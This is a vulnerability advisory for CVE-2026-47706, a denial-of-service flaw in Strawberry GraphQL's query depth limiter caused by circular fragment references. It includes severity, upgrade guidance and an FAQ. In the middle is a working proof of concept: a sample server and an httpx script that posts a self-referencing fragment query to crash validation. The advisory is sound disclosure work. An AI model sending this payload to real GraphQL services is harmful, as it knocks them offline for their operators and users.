CVE-2026-47706: Strawberry GraphQL has a Circular Fragment Reference DOS
Summary The QueryDepthLimiter extension is vulnerable to an Application-level DOS due to a lack of cycle detection in fragment spreads. When a query contains circular fragment references the determinedepth function enters an infinite recursion, leading to a RecursionError and crashing the validation process.
Details The determinedepth function in querydepthlimiter.py recursively resolves FragmentSpreadNode without maintaining a set of visited fragments. By submitting a query with circular fragment references (e.g., Fragment A $\rightarrow$ Fragment B $\rightarrow$ Fragment A), the validator enters an infinite recursion.
PoC server code import strawberry from fastapi import FastAPI from strawberry.fastapi import GraphQLRouter from strawberry.extensions import QueryDepthLimiter
@strawberry.type class User: name: str = "GONA"
@strawberry.type class Query: @strawberry.field def user(self) -> User: return User()
Enable depth limiting schema = strawberry.Schema( query=Query, extensions=[QueryDepthLimiter(maxdepth=10)] )
app = FastAPI() app.includerouter(GraphQLRouter(schema), prefix="/graphql")
exploit import httpx
Circular reference: A -> B -> A -> B ... payload = { "query": """ fragment A on User { ...B } fragment B on User { ...A } query Crash { user { ...A } } """ }
try: response = httpx.post("http://127.0.0.1:8000/graphql", json=payload) print(response.json()) except Exception as e: print(f"Server crashed or timed out: {e}")
Impact Since the validation happens before execution, an attacker can cheaply trigger this recursion error to exhaust server CPU cycles and thread/worker pools
Other sources
Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.71.0 through 0.315.6, the QueryDepthLimiter extension is vulnerable to an Application-level DOS due to a lack of cycle detection in fragment spreads. When a query contains circular fragment references the determinedepth function enters an infinite recursion, leading to a RecursionError and crashing the validation process. Version 0.315.7 patches the issue.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
pip/strawberry-graphqlto a version that resolves this vulnerability.Fixed in 0.315.7 - Upgrade
Upgrade
Strawberry GraphQLto a version that resolves this vulnerability.Fixed in 0.315.7 - Upgrade
Upgrade
Strawberry GraphQL (QueryDepthLimiter extension)to a version that resolves this vulnerability.Fixed in 0.315.7
Event History
Frequently Asked Questions
What is the severity of CVE-2026-47706?
The severity of CVE-2026-47706 is rated as medium with a score of 5.3.
How do I fix CVE-2026-47706?
To fix CVE-2026-47706, update to the latest version of Strawberry GraphQL where the vulnerability has been addressed.
What causes CVE-2026-47706?
CVE-2026-47706 is caused by a lack of cycle detection in fragment spreads within the QueryDepthLimiter extension.
What type of attack is possible with CVE-2026-47706?
CVE-2026-47706 enables an Application-level Denial of Service (DOS) due to infinite recursion in certain GraphQL queries.
Which software is affected by CVE-2026-47706?
CVE-2026-47706 affects Strawberry GraphQL libraries available via PyPI and pip.